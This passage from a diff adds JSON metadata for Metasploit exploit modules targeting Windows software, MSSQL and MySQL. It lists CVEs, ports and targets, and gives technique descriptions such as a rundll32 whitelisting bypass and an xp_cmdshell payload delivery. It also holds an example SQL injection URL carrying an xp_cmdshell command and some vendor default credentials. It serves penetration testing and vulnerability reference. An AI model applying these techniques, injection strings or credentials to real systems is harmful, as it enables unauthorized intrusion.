issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.", + "references": [ + "CVE-2016-5330", + "URL-https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html", + "URL-https://www.vmware.com/in/security/advisories/VMSA-2016-0010.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64", + "Windows x86" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb", + "is_install_path": true, + "ref_name": "windows/misc/vmhgfs_webdav_dll_sideload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/webdav_delivery": { + "name": "Serve DLL via webdav server", + "fullname": "exploit/windows/misc/webdav_delivery", + "aliases": [], + "rank": 0, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ryan Hanson ", + "James Cook " + ], + "description": "This module simplifies the rundll32.exe Application Whitelisting Bypass technique.\n The module creates a webdav server that hosts a dll file. When the user types the provided rundll32\n command on a system, rundll32 will load the dll remotly and execute the provided export function.\n The export function needs to be valid, but the default meterpreter function can be anything.\n The process does write the dll to C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\n but does not load the dll from that location. This file should be removed after execution.\n The extension can be anything you'd like, but you don't have to use one. Two files will be\n written to disk. One named the requested name and one with a dll extension attached.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/webdav_delivery.rb", + "is_install_path": true, + "ref_name": "windows/misc/webdav_delivery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/wifi_mouse_rce": { + "name": "Wifi Mouse RCE", + "fullname": "exploit/windows/misc/wifi_mouse_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-25", + "type": "exploit", + "author": [ + "h00die", + "REDHATAUGUST", + "H4RK3NZ0" + ], + "description": "The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the\n authentication is completely implemented entirely on the client side. By utilizing\n this vulnerability, is possible to open a program on the server\n (cmd.exe in our case) and type commands that will be executed as the user running\n WiFi Mouse (Mouse Server), resulting in remote code execution.\n\n Tested against versions 1.8.3.4 (current as of module writing) and\n 1.8.2.3.", + "references": [ + "EDB-50972", + "EDB-49601", + "CVE-2022-3218", + "URL-http://wifimouse.necta.us/", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 1978, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "stager" + ], + "mod_time": "2022-09-26 15:45:42 +0000", + "path": "/modules/exploits/windows/misc/wifi_mouse_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/wifi_mouse_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "screen-effects", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/windows_rsh": { + "name": "Windows RSH Daemon Buffer Overflow", + "fullname": "exploit/windows/misc/windows_rsh", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-07-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a vulnerability in Windows RSH daemon 1.8.\n The vulnerability is due to a failure to check for the length of input sent\n to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit\n to be successful.", + "references": [ + "CVE-2007-4006", + "OSVDB-38572", + "BID-25044" + ], + "platform": "Windows", + "arch": "", + "rport": 514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 SP1 English", + "Windows XP Pro SP2 English", + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/windows_rsh.rb", + "is_install_path": true, + "ref_name": "windows/misc/windows_rsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/wireshark_lua": { + "name": "Wireshark console.lua Pre-Loading Script Execution", + "fullname": "exploit/windows/misc/wireshark_lua", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-07-18", + "type": "exploit", + "author": [ + "Haifei Li", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Wireshark 1.6 or less. When opening a\n pcap file, Wireshark will actually check if there's a 'console.lua' file in the same\n directory, and then parse/execute the script if found. Versions affected by this\n vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8", + "references": [ + "CVE-2011-3360", + "OSVDB-75347", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136", + "URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Wireshark 1.6.1 or less" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/wireshark_lua.rb", + "is_install_path": true, + "ref_name": "windows/misc/wireshark_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/wireshark_packet_dect": { + "name": "Wireshark packet-dect.c Stack Buffer Overflow", + "fullname": "exploit/windows/misc/wireshark_packet_dect", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-18", + "type": "exploit", + "author": [ + "Paul Makowski", + "sickness", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n by sending a malicious packet.", + "references": [ + "CVE-2011-1591", + "OSVDB-71848", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", + "EDB-17185" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win32 Universal (Generic DEP & ASLR Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb", + "is_install_path": true, + "ref_name": "windows/misc/wireshark_packet_dect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mmsp/ms10_025_wmss_connect_funnel": { + "name": "Windows Media Services ConnectFunnel Stack Buffer Overflow", + "fullname": "exploit/windows/mmsp/ms10_025_wmss_connect_funnel", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-04-13", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the Windows Media\n Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n crafted FunnelConnect request, an attacker can execute arbitrary code\n under the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n with Windows 2000 Server, but is not installed by default.\n\n NOTE: This service does NOT restart automatically. Successful, as well as\n unsuccessful exploitation attempts will kill the service which prevents\n additional attempts.", + "references": [ + "CVE-2010-0478", + "OSVDB-63726", + "MSB-MS10-025", + "URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 1755, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb", + "is_install_path": true, + "ref_name": "windows/mmsp/ms10_025_wmss_connect_funnel", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/motorola/timbuktu_fileupload": { + "name": "Timbuktu Pro Directory Traversal/File Upload", + "fullname": "exploit/windows/motorola/timbuktu_fileupload", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-05-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a directory traversal vulnerability in Motorola's\n Timbuktu Pro for Windows 8.6.5.", + "references": [ + "CVE-2008-1117", + "OSVDB-43544" + ], + "platform": "Windows", + "arch": "", + "rport": 407, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/motorola/timbuktu_fileupload.rb", + "is_install_path": true, + "ref_name": "windows/motorola/timbuktu_fileupload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/lyris_listmanager_weak_pass": { + "name": "Lyris ListManager MSDE Weak sa Password", + "fullname": "exploit/windows/mssql/lyris_listmanager_weak_pass", + "aliases": [], + "rank": 600, + "disclosure_date": "2005-12-08", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a weak password vulnerability in the\n Lyris ListManager MSDE install. During installation, the 'sa'\n account password is set to 'lminstall'. Once the install\n completes, it is set to 'lyris' followed by the process\n ID of the installer. This module brute forces all possible\n process IDs that would be used by the installer.", + "references": [ + "CVE-2005-4145", + "OSVDB-21559" + ], + "platform": "Windows", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb", + "is_install_path": true, + "ref_name": "windows/mssql/lyris_listmanager_weak_pass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms02_039_slammer": { + "name": "MS02-039 Microsoft SQL Server Resolution Overflow", + "fullname": "exploit/windows/mssql/ms02_039_slammer", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-07-24", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This is an exploit for the SQL Server 2000 resolution\n service buffer overflow. This overflow is triggered by\n sending a udp packet to port 1434 which starts with 0x04 and\n is followed by long string terminating with a colon and a\n number. This module should work against any vulnerable SQL\n Server 2000 or MSDE install (pre-SP3).", + "references": [ + "CVE-2002-0649", + "OSVDB-4578", + "BID-5310", + "MSB-MS02-039" + ], + "platform": "Windows", + "arch": "", + "rport": 1434, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "MSSQL 2000 / MSDE <= SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms02_039_slammer.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms02_039_slammer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms02_056_hello": { + "name": "MS02-056 Microsoft SQL Server Hello Overflow", + "fullname": "exploit/windows/mssql/ms02_056_hello", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-08-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "By sending malformed data to TCP port 1433, an\n unauthenticated remote attacker could overflow a buffer and\n possibly execute code on the server with SYSTEM level\n privileges. This module should work against any vulnerable\n SQL Server 2000 or MSDE install (< SP3).", + "references": [ + "CVE-2002-1123", + "OSVDB-10132", + "BID-5411", + "MSB-MS02-056" + ], + "platform": "Windows", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "MSSQL 2000 / MSDE <= SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms02_056_hello.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms02_056_hello", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms09_004_sp_replwritetovarbin": { + "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", + "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-12-09", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", + "references": [ + "OSVDB-50589", + "CVE-2008-5416", + "BID-32710", + "MSB-MS09-004", + "EDB-7501" + ], + "platform": "Windows", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic", + "MSSQL 2000 / MSDE SP0 (8.00.194)", + "MSSQL 2000 / MSDE SP1 (8.00.384)", + "MSSQL 2000 / MSDE SP2 (8.00.534)", + "MSSQL 2000 / MSDE SP3 (8.00.760)", + "MSSQL 2000 / MSDE SP4 (8.00.2039)", + "MSSQL 2005 SP0 (9.00.1399.06)", + "MSSQL 2005 SP1 (9.00.2047.00)", + "MSSQL 2005 SP2 (9.00.3042.00)", + "CRASHER" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms09_004_sp_replwritetovarbin_sqli": { + "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection", + "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-12-09", + "type": "exploit", + "author": [ + "jduck ", + "Rodrigo Marcos" + ], + "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", + "references": [ + "OSVDB-50589", + "CVE-2008-5416", + "BID-32710", + "MSB-MS09-004", + "EDB-7501", + "URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "MSSQL 2000 / MSDE SP0 (8.00.194)", + "MSSQL 2000 / MSDE SP1 (8.00.384)", + "MSSQL 2000 / MSDE SP2 (8.00.534)", + "MSSQL 2000 / MSDE SP3 (8.00.760)", + "MSSQL 2000 / MSDE SP4 (8.00.2039)", + "MSSQL 2005 SP0 (9.00.1399.06)", + "MSSQL 2005 SP1 (9.00.2047.00)", + "MSSQL 2005 SP2 (9.00.3042.00)", + "CRASHER" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/mssql_clr_payload": { + "name": "Microsoft SQL Server Clr Stored Procedure Payload Execution", + "fullname": "exploit/windows/mssql/mssql_clr_payload", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Lee Christensen", + "Nathan Kirk", + "OJ Reeves" + ], + "description": "This module executes an arbitrary native payload on a Microsoft SQL\n server by loading a custom SQL CLR Assembly into the target SQL\n installation, and calling it directly with a base64-encoded payload.\n\n The module requires working credentials in order to connect directly to the\n MSSQL Server.\n\n This method requires the user to have sufficient privileges to install a custom\n SQL CRL DLL, and invoke the custom stored procedure that comes with it.\n\n This exploit does not leave any binaries on disk.\n\n Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).", + "references": [ + "URL-https://web.archive.org/web/20200810021536/http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2025-01-09 20:58:40 +0000", + "path": "/modules/exploits/windows/mssql/mssql_clr_payload.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_clr_payload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/mssql_linkcrawler": { + "name": "Microsoft SQL Server Database Link Crawling Command Execution", + "fullname": "exploit/windows/mssql/mssql_linkcrawler", + "aliases": [], + "rank": 500, + "disclosure_date": "2000-01-01", + "type": "exploit", + "author": [ + "Antti Rantasaari ", + "Scott Sutherland \"nullbind\" " + ], + "description": "This module can be used to crawl MS SQL Server database links and deploy\n Metasploit payloads through links configured with sysadmin privileges using a\n valid SQL Server Login.\n\n If you are attempting to obtain multiple reverse shells using this module we\n recommend setting the \"DisablePayloadHandler\" advanced option to \"true\", and setting\n up a exploit/multi/handler to run in the background as a job to support multiple incoming\n shells.\n\n If you are interested in deploying payloads to specific servers this module also\n supports that functionality via the \"DEPLOYLIST\" option.\n\n Currently, the module is capable of delivering payloads to both 32bit and 64bit\n Windows systems via powershell memory injection methods based on Matthew Graeber's\n work. As a result, the target server must have powershell installed. By default,\n all of the crawl information is saved to a CSV formatted log file and MSF loot so\n that the tool can also be used for auditing without deploying payloads.", + "references": [ + "URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012", + "URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx", + "URL-http://www.exploit-monday.com/2011_10_16_archive.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_linkcrawler", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/mssql_payload": { + "name": "Microsoft SQL Server Payload Execution", + "fullname": "exploit/windows/mssql/mssql_payload", + "aliases": [], + "rank": 600, + "disclosure_date": "2000-05-30", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "jduck " + ], + "description": "This module executes an arbitrary payload on a Microsoft SQL Server by using\n the \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", + "references": [ + "CVE-2000-0402", + "OSVDB-557", + "BID-1281", + "CVE-2000-1209", + "OSVDB-15757", + "BID-4797" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2025-03-03 19:20:56 +0000", + "path": "/modules/exploits/windows/mssql/mssql_payload.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_payload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/mssql/mssql_payload_sqli": { + "name": "Microsoft SQL Server Payload Execution via SQL Injection", + "fullname": "exploit/windows/mssql/mssql_payload_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2000-05-30", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "jduck ", + "Rodrigo Marcos" + ], + "description": "This module will execute an arbitrary payload on a Microsoft SQL\n Server, using a SQL injection vulnerability.\n\n Once a vulnerability is identified this module\n will use xp_cmdshell to upload and execute Metasploit payloads.\n It is necessary to specify the exact point where the SQL injection\n vulnerability happens. For example, given the following injection:\n\n http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n you would need to set the following path:\n set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload, specially on port 80, as you will\n stop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n your port 80 or to any other outbound port allowed on the firewall.\n For privileged ports execute Metasploit msfconsole as root.\n\n Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", + "references": [ + "CVE-2000-0402", + "OSVDB-557", + "BID-1281", + "CVE-2000-1209", + "OSVDB-15757", + "BID-4797", + "URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/mssql_payload_sqli.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_payload_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mysql/mysql_mof": { + "name": "Oracle MySQL for Microsoft Windows MOF Execution", + "fullname": "exploit/windows/mysql/mysql_mof", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-12-01", + "type": "exploit", + "author": [ + "kingcope", + "sinn3r " + ], + "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers (due to the use of a .mof file).\n This may result in arbitrary code execution under the context of SYSTEM.\n This module requires a valid MySQL account on the target machine.", + "references": [ + "CVE-2012-5613", + "OSVDB-88118", + "EDB-23083", + "URL-https://seclists.org/fulldisclosure/2012/Dec/13" + ], + "platform": "Windows", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MySQL on Windows prior to Vista" + ], + "mod_time": "2024-02-28 17:18:43 +0000", + "path": "/modules/exploits/windows/mysql/mysql_mof.rb", + "is_install_path": true, + "ref_name": "windows/mysql/mysql_mof", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/mysql/mysql_start_up": { + "name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse", + "fullname": "exploit/windows/mysql/mysql_start_up", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-12-01", + "type": "exploit", + "author": [ + "sinn3r ", + "Sean Verity " + ], + "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers. This module abuses the FILE\n privilege to write a payload to Microsoft's All Users Start Up directory\n which will execute every time a user logs in. The default All Users Start\n Up directory used by the module is present on Windows 7.", + "references": [ + "CVE-2012-5613", + "OSVDB-88118", + "EDB-23083", + "URL-https://seclists.org/fulldisclosure/2012/Dec/13" + ], + "platform": "Windows", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MySQL on Windows" + ], + "mod_time": "2024-02-28 17:18:43 +0000", + "path": "/modules/exploits/windows/mysql/mysql_start_up.rb", + "is_install_path": true, + "ref_name": "windows/mysql/mysql_start_up", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/mysql/mysql_yassl_hello": { + "name": "MySQL yaSSL SSL Hello Message Buffer Overflow", + "fullname": "exploit/windows/mysql/mysql_yassl_hello", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-01-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-0226", + "OSVDB-41195", + "BID-27140" + ], + "platform": "Windows", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MySQL 5.0.45-community-nt", + "MySQL 5.1.22-rc-community" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mysql/mysql_yassl_hello.rb", + "is_install_path": true, + "ref_name": "windows/mysql/mysql_yassl_hello", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mysql/scrutinizer_upload_exec": { + "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential", + "fullname": "exploit/windows/mysql/scrutinizer_upload_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-07-27", + "type": "exploit", + "author": [ + "MC ", + "Jonathan Claudius", + "Tanya Secker", + "sinn3r " + ], + "description": "This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.\n By default, the software installs a default password in MySQL, and binds the\n service to \"0.0.0.0\". This allows any remote user to login to MySQL, and then\n gain arbitrary remote code execution under the context of 'SYSTEM'. Examples\n of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.", + "references": [ + "CVE-2012-3951", + "OSVDB-84317", + "URL-http://web.archive.org/web/20140722224651/http://secunia.com/advisories/50074/", + "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + 